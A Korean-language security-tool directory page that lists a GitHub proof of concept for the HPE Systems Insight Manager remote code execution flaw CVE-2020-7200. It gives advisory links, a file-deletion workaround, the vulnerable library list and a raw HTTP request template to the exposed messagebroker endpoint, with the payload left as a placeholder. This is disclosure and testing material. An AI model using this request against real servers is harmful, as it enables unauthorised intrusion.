Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-7200 — CVE-2020-7200: HPE Systems Insight Manager (SIM) RCE PoC | Kitploit
도구/GitHubGitHub/alexfrancow/cve-2020-7200
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubalexfrancow/cve-2020-7200

CVE-2020-7200

CVE-2020-7200: HPE Systems Insight Manager (SIM) RCE PoC

저장소 보기
6115년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2020-7200

HPE SIM 7.6 다운로드: https://support.hpe.com/hpesc/public/docDisplay?docId=emr_na-c05350303#N10011

세부 정보: https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04068en_us

🎞 비디오: https://www.youtube.com/watch?v=QNhcNJtjKyw

HPE는 패치를 제공하지 않지만 임시 수정 방법으로 C:\Program Files\HP\Systems Insight Manager\jboss\server\hpsim\deploy\simsearch.war에서 simsearch.war를 삭제하기만 하면 됩니다. 즉, 이것이 이 취약점의 주요 원인입니다!

root@kitploit:~
Program Files\HP\Systems Insight Manager\jboss\server\hpsim\deploy\simsearch.war
└───WEB-INF
    │
    └───lib
            axis-1.4.jar
            backport-util-concurrent.jar
            cfgatewayadapter.jar
            commons-codec-1.3.jar
            commons-httpclient-3.0.1.jar
            commons-logging.jar
            concurrent.jar
            flex-messaging-common.jar
            flex-messaging-core.jar
            flex-messaging-opt.jar
            flex-messaging-proxy.jar
            flex-messaging-remoting.jar
            flex-rds-server.jar
            jaxrpc.jar
            simsearch.jar
            xalan.jar
            
Program Files\HP\Systems Insight Manager
└───lib
        jgroups-2.2.1.jar

Program Files\HP\Systems Insight Manager\jboss\server\hpsim
└───lib
        commons-collections.jar
        javassist.jar
도구 다운로드

서버 시작:

root@kitploit:~
C:\Program Files\HP\Systems Insight Manager\lbin>hpsimsvc.exe -console

요청:

root@kitploit:~
POST /simsearch/messagebroker/amfsecure HTTP/1.1
Host: 127.0.0.1:50000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Lenght: 0

<PAYLOAD>